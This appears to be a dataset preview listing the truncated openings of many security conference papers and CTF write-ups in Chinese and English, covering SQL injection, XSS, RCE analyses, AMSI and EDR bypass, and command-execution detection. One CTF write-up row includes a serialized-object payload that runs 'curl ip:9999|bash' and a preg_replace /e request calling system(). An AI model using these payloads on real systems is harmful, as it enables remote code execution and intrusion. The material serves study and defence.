text
stringlengths
100
9.93M
category
stringclasses
11 values
在P师傅小密圈看到了一道有意思的注入题 http://47.98.160.61/1.php?showme=1 代码如下: 1 <?php 2 if(!empty($_GET['showme'])) 3 highlight_file(__FILE__); 4 $aaa=mysqli_connect("127.0.0.1","test",'test','test'); 5 if(empty($_GET['id'])){ 6     $id=1; 7 }else{ 8     $id=$_GET['id']; 9 } 10 $clean = strtolower($id); 11 if (strpos($clean,'select') !...
pdf
某Air客户端0click RCE分析 前⾔ 某Air客户端的RCE漏洞曝出来有⼀段时间了,前⼈已经分析了如何利⽤%00截断实现双击 附件即可执⾏exe的效果。[详情⻅附件1] 本⽂就再进⼀步,借助⼀个XSS实现打开邮件即可触 发RCE。 XSS挖掘 翻了⼀下⽂件,发现客户端显示邮件的⻚⾯是⽤HTML写的,客户端调⽤cef渲染HTML。 HTML⽂件在 cmclient\app\template\readMail ⽬录中,其中 index.html 是⻚⾯内容; readMail.html 是邮件正⽂的模板,打开邮件时客户端会依照这个模板⽣成⼀个包含邮件正⽂ 的完整html⻚⾯放在 C:\Users\Administrato...
pdf
\ I am a legend Celine & Elie Bursztein https://www.elie.net/hs Celine & Elie Bursztein I am a legend - Defcon 2014 https://www.elie.net/hs Digital Collectible Card Game Released by Blizzard in 2014 Based of World of Warcraft universe Celine & Elie Bursztein I am a legend - Defcon 2014 https://www.elie.net/hs Somet...
pdf
Vulnerabilities of Wireless Water Meter Networks John McNabb johnmcnabb@comcast.net DEF CON 19 August 6, 2011 1 Background • 13 years as an elected Water Commissioner • 2 articles in NEWWA Journal on water infrastructure • 10 years as lobbyist for Clean Water Action • 6+ years as an IT Pro, mostly doing general tech s...
pdf
Trojan-tolerant Hardware & Supply Chain Security in Practice Who we are Vasilios Mavroudis Doctoral Researcher, UCL Dan Cvrcek CEO, Enigma Bridge George Danezis Professor, UCL Petr Svenda CTO, Enigma Bridge Assistant Professor, MUni Highlights ▪ HSMs & Shortcomings ▪ Existing Solutions ▪ Lessons learned from airpla...
pdf
How to secure the keyboard chain DEF CON 23 Paul Amicelli - Baptiste David - CVO Esiea-Ouest c Creative Commons 2.0 - b Attribution - n NonCommercial - a ShareAlike 1 / 25 The Talk 1. Background 2. Keyloggers forms 3. Main idea of our work 4. Details of our work 5. To go further 6. Finally. Paul Amicelli - Baptiste Dav...
pdf
© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Java Every-days Exploiting Software Running on 3 Billion Devices Brian Gorenc Manager, Vulnerability Researcher Jasiel Spelman Security Researcher © Copyright 2013 Hewlett-Packard Dev...
pdf
-Writeup Nu1L WEB idid=2333flag ssrf+sqli fuzzsecertdownload.phpssrf insertpayload: gitpayload: O:7:"Record":3:{s:4:"file";s:19:" curl ip:9999|bash ";} $ad sqlmap flag .index.php.swn upload.php unzip.sh . zipgetshell pregpayload http://47.104.74.209:20005/index.php?pat=/test/e&rep=system('ls -la')&sub=jutst test id 1%00...
pdf
7.27.2012 frak.redballoonsecurity.com R E D BALLOON S e c u r i t y { Ang Cui | a@redballoonsecurity.com } www.redballoonsecurity.com FIRMWARE R E V E R S E A N A L Y S I S K O N S O L E W H O A M I W H A T D O I D O 7.27.2012 frak.redballoonsecurity.com a@redballoonsecurity.com W H O A M I W H...
pdf
IPv6 Primer Gene Cronk – CISSP, NSA-IAM SME – North American IPv6 Task Force Systems Admin – The Robin Shepherd Group gene@hacksonville.org Why IPv6? Quick History • 1992 • Internet Engineering Task Force (IETF) • Global shortage of IPv4 addresses • Technical limitations of IPv4 • 1993 • RFC1550 created • 1995 • Next...
pdf
Presentation Slides with Notes: “Predicting Susceptibility to Social Bots on Twitter” by Chris Sumner & Dr. Randall Wald Presented at: Black Hat Briefings 2013 (Las Vegas, NV, USA) & DEF CON 21 (Las Vegas, NV, USA) Slide 1 Predicting Susceptibility to Social Bots on Twitter Chris Sumner & Dr. Randall Wald chri...
pdf
DOM-XSS 漏洞的挖掘与攻击面延伸 陈思涛 北京长亭科技有限公司深圳分公司Web安全研究员 目录 DOM-XSS 挖掘与利用 DOM-XSS 常见位置 DOM-XSS 优势在哪 XSS 巧妙利用 DOM-XSS常见位置 DOM-XSS 常见位置 1、URL代入页面 这类DOM-XSS是最常见的,它的漏洞点通常是以下形式出现 DOM-XSS 常见位置 它出现的地方比较多,可能会是名称,地点,标题等等。 大多数情况下它和反射型XSS的区别不大,最大的区别是取的值不同。 此时取值时,匹配的URL是location.href,这个值包含了 location.search 和 location.hash 的值,而 location.has...
pdf
CVE-2022-22947 SpringCloud GateWay SPEL RCE echo response 环境 git clone https://github.com/spring-cloud/spring-cloud-gateway cd spring-cloud-gateway git checkout v3.1.0 审计 看diff https://github.com/spring-cloud/spring-cloud- gateway/commit/337cef276bfd8c59fb421bfe7377a9e19c68fe1e org.springframework.cloud.gateway.suppo...
pdf
Exploiting Continuous Integration (CI) and Automated Build Systems And introducing CIDER Whoami • SpaceB0x • Sr.+Security+Engineer+at+LeanKit • Application+and+network+security+(offense+and+defense) • I+like+breaking+in+to+systems,+building+systems,+and+learning • Security+consultant ./agenda.sh • Overview+of+Continu...
pdf
Breaking Forensics Software: Weaknesses in Critical Evidence Collection Tim Newsham - <tim[at]isecpartners[dot]com> Chris Palmer - <chris[at]isecpartners[dot]com> Alex Stamos - <alex[at]isecpartners[dot]com> iSEC Partners, Inc 115 Sansome Street, Suite 1005 San Francisco, CA 94104 http://www.isecpartners.com July 1, 20...
pdf
Esoteric Exfiltration Willa Riggins Who Am I? Seriously, people. Does someone know? Cause I don’t. ● Senior Penetration Tester @ Veracode ● FamiLAB Member ● DC407 Point of Contact ● OWASP Orlando Marketing Coordinator ● BSides Orlando Social Media Lady ● @willasaywhat on Twitter Exfiltration 101 What Is It? “Da...
pdf
pocassist浅析 author: https://github.com/Ciyfly pocassist浅析 项目代码目录 流程图 cmd/pocassist.go 整个程序启动入口 init RunApp RunServer InitAll 加载配置文件 下面是所有的配置展开 conf.Setup() 加载全局配置文件 logging.Setup() 加载日志配置文件 db.Setup() 加载db配置文件 routers.Setup() 配置web util.Setup() 限流初始化 fasthttpclient jwt secret 初始化 rule.Setup() 规则配置相关初始化 ExecScriptHandle...
pdf
INSECURITY ENGINEERING: Locks, Lies, and Videotape LOCK DESIGN: MECHANICAL v. SECURITY ENGINEERING ¨ PRIOR DefCon PRESENTATIONS ¨ Vulnerabilities in mechanical and electro- mechanical locks ¨ Resulted from Defective or Deficient engineering ¨ All-encompassing standards problem ¨ Failure to understand “why” locks can be...
pdf
​ sdk 0x00 0x01 0x02 1 is_root:true 2 1 2 0x03 0x04 3root ​ 4 xposed008krealtoolsubstrate007FakeGpsmockgps IMEI IMSIMTKNZT 5VPN /* * * */ private boolean isWifiProxy(Context context) { // 4.0 final boolean IS_ICS_OR_LATER = Build.VERSION.SDK_INT >= Build.VERSION_CODES.ICE_CREAM_SANDWICH; String pr...
pdf
Inceptor Bypass AV/EDR solutions combining well known techniques 1 Copyright © 2021 Alessandro Magnosi. All rights reserved Version 1.0 Alessandro Magnosi (@klezVirus) Copyright © 2021 Alessandro Magnosi. All rights reserved WhoAmI Senior Security Noob ● Red Teamer, Code Reviewer… What I do the most: ● Mostly.. I spend...
pdf
EMET 4.0 PKI MITIGATION Neil Sikka DefCon 21 ABOUT ME • Security Engineer on MSRC (Microsoft Security Response Center) • I look at 0Days • EMET Developer • I enjoy doing security research on my free time too: http://neilscomputerblog.blogspot.com/ • Twitter: @neilsikka OVERVIEW 1. What Is EMET? 2. New Features in EMET ...
pdf
Attacking The Internet of Things (using time) Paul McMillan Who am I? There are many ways to attack the Internet of Things Demo (start) What is a timing attack? def authenticate_user(user, pass): stored_hash=get_password_hash(user): if stored_hash: test_hash = sha1(password) if test_hash == stored_hash: Return True El...
pdf
Conducting Massive Attacks With Open Source Distributed Computing By Alejandro Caceres (@DotSlashPunk) DEF CON 21 How to (almost) get fired from your job Step 1: Speak at a hacker con on your open source community-focused side project (PunkSPIDER) - Combined distributed computing (my main area of research) wit...
pdf
群聊精华 2021.7.27-2021.8.1 @haya问:密码喷洒的密码,感觉字典是个大问题,大家有不错的这种强弱口令字典吗? @wywwzjj: https://github.com/r35tart/RW_Password @L.N.: https://github.com/berzerk0/Probable-Wordlists https://github.com/kaonashi-passwords/Kaonashi @haya: https://github.com/L-codes/pwcrack-framework @山顶洞小霸王 Windows下net accounts 命令可以查密码策略 @Astartes 密码喷...
pdf
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! Orange Tsai Taiwan No.1 About Orange Tsai The most professional red team in Taiwan About Orange Tsai The largest hacker conference in Taiwan founded by chrO.ot About Orange Tsai Speaker - Speaker at several security conferences HITCON, WooYun...
pdf
Nu1L StarCtf Writeup Nu1L StarCtf Writeup Pwn heap master hackme OOB babyshell girlfriend quicksort upxofcpp blind pwn Web Echohub 996 Game mywebsql Misc babyflash otaku Checkin She Sokoban homebrewEvtLoop— homebrewEvtLoop# Reverse Matr1x fanoGo yy Obfuscating Macros II Crypto babyprng babyprng2 notcurves notfeal Pwn he...
pdf
Token Kidnapping's Revenge Author: Cesar Cerrudo (cesar.at.argeniss.dot.com) Argeniss – Information Security & Software Table of contents Table of contents..................................................................................................................................2 Abstract............................
pdf
First step in the quest for manufacturing cyber-resilient IoT devices Panasonic Corporation Jun Sato Chih-Hsiang HITCON 2020@TAIPEI About me ・佐藤 淳 ・Jun Sato ・Past experience in system development and operation ・Joined Panasonic in 2019 and involved in IoT security ・CISSP, GCFA Background サイバーセキュリティ戦略本部 サイバーセキュリティ2019...
pdf
Github Security n|u - The Open security community Chennai Meet Presenter : Vinothkumar Date : 27/04/2019 About Me Application security engineer @ Freshworks, Inc. Blogger @ https://tutorgeeks.blogspot.com Tweet @vinothpkumar Github @ https://github.com/tutorgeeks Agenda for the session 1. What is Github 2. Using Github...
pdf
Effective InfoSec Career Planning Beyond Job Hopping to a Real Career Lee Kushner / Mike Murray Lee@InfoSecLeaders.com / Mike@InfoSecLeaders.com 2 Who Are We? • InfoSecLeaders.com – The best source for career guidance for information security professionals – A place to learn, grow, ask and share about the difficultie...
pdf
Cloud inSecurity TT@chroot.org HIT2008 Cloud inSecurity Who am I? Camera man @ HITCon Member @ Sr. Engineer @ Network Security Web 2.0 Security BSD/Linux Kernel Firewall Internal IPS/IDS Anti-SPAM Antivirus Programming Network Appliance 苦命工程師 過勞 好人 Orz Network Access Control 加班 Before the Presentation This is a trend d...
pdf
Security Assurance Basics: Offensive Security Assurance “Penetration Testing 101” (mRr3b00t’s Notebook draft edition 0.3) Author: Daniel Card Penetration Testing PUBLIC – Version 0.3 Copyright Xservus Limited Page 2 Contents Copyright ...............................................................................
pdf
Urban Exploration - A Hacker’s View phreakmonkey (K.C.) mutantMandias (Mandias) phreakmonkey.com Latest Slides: http://phreakmonkey.com/dc16-ue.zip DISCLAIMER Urban Exploration can be dangerous. Trespassing can get you arrested, jailed, or killed. Falling great distances can kill you. Exposure to asbestos, ...
pdf
RE:Trace – Applied Reverse Engineering on OS X Tiller Beauchamp SAIC David Weston Microsoft DTRACE BACKGROUND What Is DTrace™? *Dtrace was created by Sun Microsystems, Inc. and released under the Common Development and Distribution License (CDDL), a free software license based on the Mozilla Public License (MPL). DTr...
pdf
前 言 《Java 开发手册》是阿里巴巴集团技术团队的集体智慧结晶和经验总结,经历了多次大规模 一线实战的检验及不断完善,公开到业界后,众多社区开发者踊跃参与,共同打磨完善,系统化地 整理成册。现代软件行业的高速发展对开发者的综合素质要求越来越高,因为不仅是编程知识点, 其它维度的知识点也会影响到软件的最终交付质量。比如:数据库的表结构和索引设计缺陷可能带 来软件上的架构缺陷或性能风险;工程结构混乱导致后续维护艰难;没有鉴权的漏洞代码易被黑客 攻击等等。所以本手册以 Java 开发者为中心视角,划分为编程规约、异常日志、单元测试、安全规 约、MySQL 数据库、工程结构、设计规约七个维度,再根据内容特征,细分成若干二级子目录。 另...
pdf
By Lawrence Baldwin & Jaeson Schultz “Extreme IP Backtracing” I've been attacked… now what? The reality is that few attacks are launched directly from an attacker's system since they know they would be easily caught using standard backtracing methods. The Internet is chock full of insecure systems which are easily ...
pdf
I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I cd cd /home/ /home/tjmunn tjmunn/.loop /.loop I I insmod insmod -...
pdf
Covert Post-Exploitation Forensics With Metasploit Tools and Examples R. Wesley McGrew wesley@mcgrewsecurity.com http://mcgrewsecurity.com Mississippi State University National Forensics Training Center http://msu-nftc.org Introduction In digital forensics, most examinations take place after the hardware has been phys...
pdf
Evolution of iOS Data Protection and iPhone Forensics: from iPhone OS to iOS 5 Andrey Belenko & Dmitry Sklyarov Elcomsoft Co. Ltd. 1 Agenda • Basics • iOS Security before iOS 4 • iOS 4 Data Protection • iOS 5 Data Protection Changes • Summary 2 Forensics 101 Acquisition ➜ Analysis ➜ Reporting GOALS: 1.  Assuming  ...
pdf
对Bypass AMSI混淆篇中的代码浅析 L.N.师傅在最后给出了我一个代码,然而我发现我根本看不懂。虽然拿来就用确 实很爽,但是换个场景,过段时间或许就不可行了。于是学习了一下下面这段 代码到底在干吗。看了一下觉得关键代码是 $c=[string](0..37|%{[char] [int](29+($a+$b).substring(($_*2),2))})-replace " " 于是对这串代 码做学习 # 0x01 代码解析 要弄懂的就是下面这几个问题: 1.0..37|%{}:其实这个感觉猜也能猜出来,循环的一种写法,循环38次 2. $_ 是个啥?说实话一开始我也弄不明白这到底是什么写法,后来直接就是在 powersh...
pdf
Metasploit 基础知识 整理此文档,纯粹出于兴趣爱好,如果有涉及版权的问题,请联系原文档的作者. 由于本人能力有限,文档中难免会有些错误,欢迎大家来信指正. [原文]http://www.offensive-security.com/metasploit-unleashed/ Metasploit 基础知识 Metasploit 框架提供了多种不同的接口,每个接口都有自己的优势与不足。尽管如此,目前仍 没有一个很好的接口用于使用 MSF(尽管 msfconsole 能够访问 Metasploit 的众多特性)。当 然,了解熟悉 MSF 提供的所有接口,多工作还是很有效的。 Msfcli Msfcli 为 fra...
pdf
Grendel Scan Grendel-Scan Distribution Written entirely in Java Written entirely in Java Uses Eclipse’s Standard Widget Toolkit (SWT) Windows, Linux and Mac builds Only requirement is JRE 1.5 or later Primary Libraries Apache HTTP Components - http://hc apache org/ Apache HTTP Components http://hc.apache.org/ H...
pdf
@Y4tacker Enjoy模板引擎分析 前置 ⾸先有关Enjoy模板引擎的⼀些描述可以看这⾥:https://jfinal.com/doc/6-1 ⽂档中值得关注的点 属性访问触发get⽅法 在官⽅⽂档⾥⾯我们可以看到很多有趣的东西(当然我会更关注于⼀些相关的),⽐如属性访问 的这⼀条描述,可以让我们去触发对象的get⽅法(前提是public修饰) ⽅法调⽤ 由于模板引擎的属性取值表达式极为常⽤,所以对其在⽤户体验上进⾏了符合直觉的扩展,field 表 达式取值优先次序,以 user.name 为例: 如果 user.getName() 存在,则优先调⽤ 如果 user 具有 public 修饰过的name 属性,则取 ...
pdf
IOActive, Inc. Copyright ©2014. All Rights Reserved. Weird-Machine Motivated Practical Page Table Shellcode & Finding Out What's Running on Your System Shane Macaulay Director of Cloud Services IOActive, Inc. Copyright ©2014. All Rights Reserved. Killing the Rootkit! And how to find everything running on yo...
pdf
Outsmarting the Smart City DISCOVERING AND ATTACKING THE TECHNOLOGY THAT RUNS MODERN CITIES & 2 Page Researcher Bios • Daniel Crowley • Research Baron at IBM X-Force Red • Pen tester since 2004 • Locksport enthusiast and past competition winner • Actually holds the title of Baron (in Sealand) 3 Page Researcher Bios • ...
pdf
Pwn the Pwn Plug: Analyzing and Counter-Attacking Attacker-Implanted Devices Wesley McGrew Assistant Research Professor Mississippi State University Center for Computer Security Research McGrew Security wesley@mcgrewsecurity.com Introduction •Wesley McGrew •Breaking things, RE, forensics, etc. •Finally finished disserta...
pdf
Open in 30 Seconds Cracking One of the Most Secure Locks in America Marc Weber Tobias Matt Fiddler LOCKS, LIES, and “HIGH” INSECURITY • Dominant high security lock maker • 40 year history of security • Many expert attempts to crack with limited success, complicated tools • Misstatements and disinformation • 18 month re...
pdf
30-Jun-08 Defcon16 2008 1 Open Source Warfare Origins Use Transformations Day Three: Sunday, August 10 10:30 am Track 3 30-Jun-08 Defcon16 2008 2 …Oh my…. What is Asymmetric Warfare •Is it purely defensive •Does it rely on traditional concepts •How does an established fighting group use it •Does it overlap with other...
pdf
Exploitations of XNU Port Type Confusions Tielei Wang The background Background of the talk iOS 14.2, released on Nov 5, 2020, fixed an in-the-wild exploit reported by Google Project 0. First in-the-wild exploit since iOS 14 (?) Safari RCE (CVE-2020-27930) kernel info leak (CVE-2020-27950) kernel type confusion (CVE-2...
pdf
Abusing Bleeding Edge Web Standards for AppSec Glory Bryant Zadegan Ryan Lester Advisor/Mentor CEO, Co-Founder Mach37 Cyph keybase.io/bryant hacker@linux.com @eganist @TheRyanLester • Does AppSec stuff, usually. • Mentors security startups, sometimes. • “Mentors” others on AppSec, occasionally. • Paid a buck to mak...
pdf
2020年RSAC关键热点 DevSecOps左移开发安全 思路分享 2 安全圈的奥斯卡已开幕 RSAC已在美国当地时间2月24日—28日开启 RSA大会是信息安全界最有影响力的业界盛会之一。RSA大会一年一度分别在美国、欧洲和日本 举办,其议程设计由信息安全从业者及其它相关专业人士评判和制定。RSA大会一直吸引着世界 上最优秀的信息安全人士,创造机会让参会者跟同辈和杰出人物、跟新兴企业和知名企业直接交 流,了解信息安全的最重要课题。 3 聊些八卦 ✓ 外国友人想请你喝一杯的时候要三思 如果你有朋友或同事是第一次参与! ✓ 不在非授权情况下接受外媒采访 4 一起来认识RSA RSA 大会是信息安全界最有影响力的业界盛会之一 一、那它...
pdf
⼜到了提笔写年终总结的时候,和以前拼命想记录⽣活状态不同,这次我却不知道从哪开始写起。就想到啥写啥 吧。 北京 今年年初来到了北京,没有了昔⽇了朋友,在北京还是很孤独的。跨年夜我和⼥朋友吃完晚饭,说想找个地⽅⼀起 跨年,竟然发现没有什么好去的地⽅。想到三⾥屯离我们最近,那边应该好玩,打开打⻋软件发现附近堵⻋已经堵 了⼏条街了,瞬间打消了去意,想买点东⻄回家吃,但是已经快10点,附近超市什么的都关⻔了,也想不到买点 啥,就这样两⼿空空回到出租屋和好友们在游戏中度过了跨年的钟声。 Hacking8安全信息流 写总结第⼆个想到的就是总结⼀下hacking8,这是我今年花费时间最多的⼀个东⻄,我得好好总结下,从去年五 ⽉⼀号写第⼀⾏代码到现...
pdf
java.io.ObjectInputStream 反序列化分析 -… Skay 这⾥主要参考了李三师傅的⽂章 http://redteam.today/2020/02/14/Java%E5%8E%9F%E 7%94%9F%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8E%E5%8F%8D%E5%B A%8F%E5%88%97%E5%8C%96%E4%BB%A3%E7%A0%81%E7%AE%80%E8%A6%8 1%E5%88%86%E6%9E%90/ 膜膜膜 感觉看了⽂章⼀下⼦明⽩了好多,当然还有好很多疑问 图镇楼 (1) ⾸先起⼀个Demo调试环境 被序列化的类 /** 1 我们的序列化和反序列化⽅法 ...
pdf
Advisory. New Sandworm malware Cyclops Blink replaces VPNFilter Version 1.0 23 February 2022 © Crown Copyright 2022 New Sandworm malware Cyclops Blink replaces VPNFilter The Sandworm actor, which the UK and US have previously attributed to the Russian GRU, has replaced the exposed VPNFilter malware with a n...
pdf
腾讯 WAF 挑战赛回忆录 by do9gy Part 0 应各位好友诚挚邀请,分享一下 WAF Bypass 相关的技巧。其实本来应该在比赛结束就 跟大家分享,无奈于 TSRC 那边对各位师傅提交的 Bypass 尚未统一修复,一直推迟到今日。 本文披露的相关技术信息已经得到 TSRC 有关方面的许可,且隐藏了相关 POC 的内容,只 分享技术原理及绕过思路,希望能够起到抛砖引玉的作用。 首先谈一下 WAF。Web 应用防火墙,主要用途是对 HTTP(s)协议进行校验,拦截恶 意的攻击请求,放行正常的业务请求。从架构来看,主要分为:网络层、应用层、云 WAF 三 类。从绕过来看,分为通用型绕过和单一规则绕过。通用型...
pdf
0x00 asciijava p 2014https://www.leavesongs.com/HTML/javascript-up-low-ercase-tip.html ſ //S ı //I K //k p 2014javascriptjava 0x01 FILE:///ETC/PASSWD java javabean org.apache.commons.beanutils.BeanUtils formField person Sex ſ s 0x02 javabean
pdf
Investigating the Practicality and Cost of Abusing Memory Errors with DNS Project Bitfl1p by Luke Young $ whoami Undergraduate Student - Sophomore Founder of Hydrant Labs LLC This presentation is based upon research conducted as a employee of Hydrant Labs LLC and was not supported or authorized by any previous, cu...
pdf
Intelligence Gathering DefCon X Vic Vandal vvandal@well.com NECESSARY DISCLAIMER: This talk discusses various illegal techniques and concepts. The author does not endorse nor does he condone the execution of any of those illegal activities discussed. ESPECIALLY the Information Warfare concepts. Types of Intelligence G...
pdf
The Minimum Elements For a Software Bill of Materials (SBOM) Pursuant to Executive Order 14028 on Improving the Nation’s Cybersecurity The United States Department of Commerce July 12, 2021 Department of Commerce The Minimum Elements for an SBOM 2 Table of Contents Table of Contents ...........................
pdf
NISRA ◎ 王薪嘉 ◎ 現任 NISRA 會長 2 ◎ 靜態 • 只能瀏覽資料 (純粹圖文) • Html + CSS ◎ 動態 • 用戶端與伺服器可以互動 • Ex: 投票系統、檔案上傳、購物網站, etc • PHP, JSP, ASP, etc 上傳 伺服器 顯示 user user user 程式 資料庫 php asp 上傳 上傳 伺服器 伺服器 顯示 輸入&產生 user user user user user user 資料隱碼攻擊 ◎ Structured Query Language,一般習慣唸成 "sequel",不過正確的唸法應該是 "S-Q-L" ◎ 是一種常見於資料庫的語言,用於資料存取、查詢、 更新和...
pdf
Consumer Automotive Technology Retail Life Sciences & Healthcare Energy & Chemicals Uroburos Paul Rascagneres Senior Threat Researcher GDATA SecurityLabs Page Uroburos | HITCON | August 2014 Uroburos is a rookit revealed to the public by G DATA in February 2014. The purpose of the rootkit is to maintain re...
pdf
The future frontier of Hacking - UMTS mobile phone platform Web intrusions: the best indicator of the vulnerable status of the Internet Speaker: SyS64738 www.zone-h.org Zone-H.org Zone-H.org Zone-H.org: the Internet thermometer? Zone-H.org SECURE HACKABLE F#CKABLE Digital attacks amount since 2002 1600 1811 2341 365...
pdf
WPA TOO ! Md Sohail Ahmad AirTight Networks www.airtightnetworks.com About the Speaker 2007, Toorcon9 2009, Defcon 17 2008, Defcon 16 Caffe Latte Attack Autoimmunity Disorder in Wireless LANs WiFish Finder: Who will bite the bait? 2010, Defcon 18 WPA TOO ! Defcon 18 WPA2 is vulnerable under certain conditions. This ...
pdf
封面 书名 版权 前言 目录 第一部分 准备工作 第1 章 熟悉工作环境和相关工具 1 . 1 调试工具Mi c r o s o f t V i s u a l C + + 6 . 0 和O l l y D B G 1 . 2 反汇编静态分析工具I D A 1 . 3 反汇编引擎的工作原理 1 . 4 本章小结 第二部分C + + 反汇编揭秘 第2 章 基本数据类型的表现形式 2 . 1 整数类型 2 . 1 . 1 无符号整数 2 . 1 . 2 有符号整数 2 . 2 浮点数类型 2 . 2 . 1 浮点数的编码方式 2 . 2 . 2 基本的浮点数指令 2 . 3 字符和字符串 2 . 3 . 1 字符的编码 2 ...
pdf
django 写bugbounty平台 登陆⻚⾯ 登陆后 点击“项⽬” 新增/修改项⽬ 项⽬概览 点击任意项⽬后进⼊项⽬概览,这⾥修改了 django 的路由以及新增了⾃⼰的⻚⾯,⽬前是该项⽬的 DNS 展示。
pdf
Insecure.Org Insecure.Org Nmap: Scanning the Internet by Fyodor Black Hat Briefings USA – August 6, 2008; 10AM Defcon 16 – August 8, 2008; 4PM Insecure.Org Insecure.Org Abstract The Nmap Security Scanner was built to efficiently scan large networks, but Nmap's author Fyodor has taken this to a new level by scanning m...
pdf
java反序列化基础知识总结 java的类加载过程 1. 首先是调用 public Class<?> loadClass(String name) 方法,通过public方法调用保护方法 protected Class<?> loadClass(String name, boolean resolve) 2. 在 protected loadClass 方法中,第400行会调用一个 findLoadedClass 方法判断当前类是否已 经加载。如果类已经加载,直接返回当前类的类对象。 3. 如果创建当前 ClassLoader 时传入了父类加载器( new ClassLoader (父类加载器))就使用父类加载 器加载 Test...
pdf
{ Breaking the x86 ISA domas / @xoreaxeaxeax / DEF CON 2017 Christopher Domas Cyber Security Researcher @ Battelle Memorial Institute ./bio We don’t trust software. We audit it We reverse it We break it We sandbox it Trust. But the processor itself? We blindly trust Trust. Why? Hardware has all the same prob...
pdf
Advances in Linux process forensics with ECFS Quick history ● Wanted to design a process snapshot format native to VMA Vudu ● http://www.bitlackeys.org/#vmavudu ● ECFS proved useful for other projects as well Problem space  A process address space is complex with many components ➢ ELF binary format (structural n...
pdf
XSS Bypass Cookbook ver 3.0 XSS Bypass Cookbook [+] Author: math1as [+] Team: L team #1 引言 在目前的web安全漏洞中,xss一直属于热门的一类,而它对用户造成的危害较大。 因此也引发了不少安全爱好者和专业工程师的研究。 而html5等新技术的使用和具体业务场景中复杂的环境带给了xss更大的生存空间。 而且不同xss向量也因为浏览器的特性会有所区别 比如chrome在加载资源时会校验服务器返回的mimeType 而firefox则根据标签自己设定的type来做出处理 本文在目前较为常见的几种过滤条件下,简单的探讨了xss这一技术的应用以及绕过 相...
pdf
This document and its content is the property of Airbus Defence and Space. It shall not be communicated to any third party without the owner’s written consent. All rights reserved. CANSPY a Platform for Auditing CAN Devices Arnaud Lebrun Jonathan-Christofer Demay 2 Arnaud Lebrun Jonathan-Christofer Demay CANSP...
pdf
Managing Your Own Security Career Mike Murray & Lee Kushner mmurray@episteme.ca Lee@LJKushner.com How to be happy, challenged and well-compensated Who Are We? ✴ Lee Kushner ✴ Over 10 years of Success Recruitment of Information Security Professionals ✴ Founder and CEO of the Leading Information Security Recruitm...
pdf
洞态IAST与黑盒、白盒 共建DevSecOps 01 02目录 1> IAST检测原理 2> 洞态IAST架构设计 3> 灰盒、黑盒、白盒共建DevSecOps 4> 部署与落地 IAST检测原理 03 03 IAST检测原理 IAST(Interactive AST,交互式扫描器)高频、高效、无脏数据 应用运行 态分析 污点跟 踪算法 准确率高 效率高 无脏数据*  原理  效果 覆盖度完整 03 IAST检测原理 污点跟踪算法 不可信数据采集 不可信数据预处理 不可信数据传播图 数据调用链路查找 decode id _jspService put id id getParameter exec cmd->id decod...
pdf
最近在研究关于聊天软件的一些信息获取。 对于微信来说获取个人信息就是读取内存中的字符串,这些字符包括电话、数据库key、username、 wxid等等,但是微信不同的版本字符串在内存中的位置不一样,也就是偏移不一样,看之前的 BIOPASS RAT ,它的微信模块定位使用版本号,不同版本号的偏移不一样。 艹老师说这种方式太麻烦了,微信每更新一个版本就得更新偏移。于是,我研究了根据微信特定数据结 构定位的方式,这种方式可以全版本通用。 定位 因为我的主要目的是获取数据库的key,通过看雪的这篇文章 https://bbs.pediy.com/thread-251303.htm 可以得到我的key 地址是 14DA32A0 打开...
pdf
defcon xv defcon xv hacker culture around the (corporate) world hacker culture around the (corporate) world luiz eduardo luiz eduardo defcon xv defcon xv hi hi … networking guy … security guy … works for mu security … wlan at security cons … regular speaker at security cons … defcon networking goon … founder o...
pdf
命令执行无回显的判断方法及 dnslog 相关例题 一、命令执行判断 命令执行可能会存在命令执行完没有回显,首先要判断命令 是否有执行,可以通过三种方式来判断:延时、HTTP 请求、 DNS 请求。 1、 延时: 无延时无回显 有延时无回显 通过是否延时来判断该条命令是否有执行,有延时则代表命 令有执行。(”sleep 3”表示延时 3 秒) 2、 HTTP 请求:目标机通过向公网可通信的机子发起 http 请求,而这个公网可通信的机子是我们可控的,则当该公 网机子收到 http 请求就代表命令有执行。 例:我们在公网机上可以通过”nc -lv 端口号”来监听该端口, 当目标机”curl 公网机 ip:端口号”的时候,公网机的该端口...
pdf
1. 前言 昨晚看到朋友圈推了个和裸聊诈骗斗智斗勇的视频,点进去一看感觉和上个月搞得一个站的后台很像, 所以想上去看一下,结果网站关了,就通过fofa重新搜了一个存活的网站,发现确实很像。 于是就有了这篇文章,由于很多都是后补的图,可能不是很完整,见谅。 2. 第一次shell 由于上次拿到目标的时候就给了一个域名,所以先浏览一下看看,常规的扫一下目录。 发现存在 uploads , temp , tmp 这几个看起来很像上传文件的目录,而且有 file.php 这个文件,然后发 现扫出很多奇奇怪怪的东西,猜测对应目录nginx应该是设置了php禁止执行。 首页长这样 由于没有给我提供账号密码(后面发现这个是后台登录。。给账号密码就...
pdf
@0x222 Paul Such (SCRT) @Agixid Florian Gaultier (SCRT) PLAYING WITH CAR FIRMWARE (OR HOW TO BRICK YOUR CAR) SUMMARY •  Who am I ? •  Hacking car firmware , why ? •  Model •  Hidden menu •  Finding the firmware – sources •  Analyzing the firmware •  Some interesting results •  A 2.2 Ton (4400 pounds) brick...
pdf
Dance with Apple Core 盘古安全实验室 关于我们 • 专业的移动安全研究团队 • 专注物联时代安全 • 专心与最新的安全技术 Apple内核101 • 内核 (XNU)是Mach/BSD的混合体 • 运行的驱动程序在单独分离的一套框架 • “DriverKit”也就是现在的IOKit Apple内核101 • BSD • XNU的最上层是POSIX/BSD体系 • 采用FreeBSD6.0的代码 • 提供files, processes/pthread, signals等等 • Apple扩展: 增加了很多独有的syscalls • Mach • 内核中的微内核 • NeXTSTEP时代的遗留产物 • 提供tas...
pdf
1 Vista Log Forensics Dr. Rich Murphey, ACS Background Case Study Engagement Preliminary Report Final Report Vista Event Logging Logging Service Vista Event Encoding Undocumented Internals Event Log Analysis Recovery Correlation Interpretation Shadow Copy Services Provider C Provider C Provider B Provider B Pr...
pdf
